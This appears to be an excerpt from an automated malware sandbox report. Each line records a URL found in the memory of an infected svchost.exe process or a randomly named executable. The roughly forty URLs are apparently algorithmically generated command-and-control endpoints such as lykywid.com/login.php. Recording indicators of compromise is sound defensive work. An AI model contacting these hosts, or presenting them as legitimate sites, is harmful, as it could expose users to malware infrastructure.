Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2375998901.00000000093C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2375515746.00000000093B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyrew.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2729337658.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2913582701.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2735954545.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyvyw.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2896263867.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykygun.com/login.php
Source: svchost.exe, 00000002.00000003.2396904091.000000000331D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2427094852.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387196147.000000000331C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2385326544.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2572564754.0000000000FB2000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2744689381.0000000009396000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.00000000007DF000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 
0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.0000000001555000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2640207678.00000000013B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjad.com/login.php
Source: svchost.exe, 00000002.00000003.2885524752.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376391418.000000000331E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377025491.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376466077.0000000003325000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2375586174.000000000332D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379454788.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2375980019.0000000003321000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381729845.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377198818.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376798591.0000000003325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykymij.com/login.php
Source: svchost.exe, 00000002.00000003.2344956997.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344112591.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341852646.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344054756.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykymyr.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykynon.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyser.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2913582701.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykytin.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvyx.com/login.php
Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykywid.com/
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykywid.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2913582701.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymygor.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2427094852.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjix.com/login.php
Source: svchost.exe, 00000002.00000003.2509683984.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2507122526.00000000040F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2506997946.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjon.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjyd.com/login.php
Source: svchost.exe, 00000002.00000002.3418118048.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2920308111.0000000009376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2929340762.0000000009379000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2913582701.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2915948048.0000000009376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.0000000009298000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2916039850.0000000009374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymylen.com/login.php
Source: svchost.exe, 00000002.00000003.2667584330.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2694181112.00000000040F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymymax.com/H
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymymax.com/login.php
Source: svchost.exe, 00000002.00000003.2498726255.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymymud.com/
Source: svchost.exe, 00000002.00000003.2509683984.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310717488.000000000331A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311969896.000000000331C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2506997946.0000000003363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymymud.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymynuj.com/login.php
Source: svchost.exe, 00000002.00000003.2334241023.00000000008E1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612622918.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2631989272.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2571444797.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575537635.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336999342.00000000008E7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymysud.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635305989.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341852646.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymytar.com/login.php
Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyvin.com/
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649747897.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347178577.0000000003322000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349507832.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349422845.000000000332C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347033417.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647496494.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347613705.0000000003325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywun.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612622918.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2631989272.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2601374159.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575537635.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyxex.com/login.php
Source: svchost.exe, 00000002.00000003.2875776226.00000000040F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyxir.com/h
Source: svchost.exe, 00000002.00000003.2637865779.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337019540.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2571444797.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635608953.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryfox.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379463124.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373591398.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryfyr.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2546183887.0000000003330000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552027006.0000000003323000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2621634311.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2586800323.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2605599453.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2622010653.0000000003331000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2616595511.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552026882.0000000003331000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2617062118.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrygyn.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2751476610.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2673794801.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryjej.com/login.php
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2511691560.0000000003325000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310815345.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2530049232.000000000332A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2511442886.0000000003330000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499110020.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2511703150.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2511409546.0000000003323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryjir.com/login.php
Source: svchost.exe, 00000002.00000003.2289346650.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296615273.000000000337B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2289345179.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryled.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrylix.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746888339.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2829874698.000000000084D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363422290.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363692365.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362592176.00000000092C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryman.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329971226.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrynad.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377025491.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryson.com/login.php
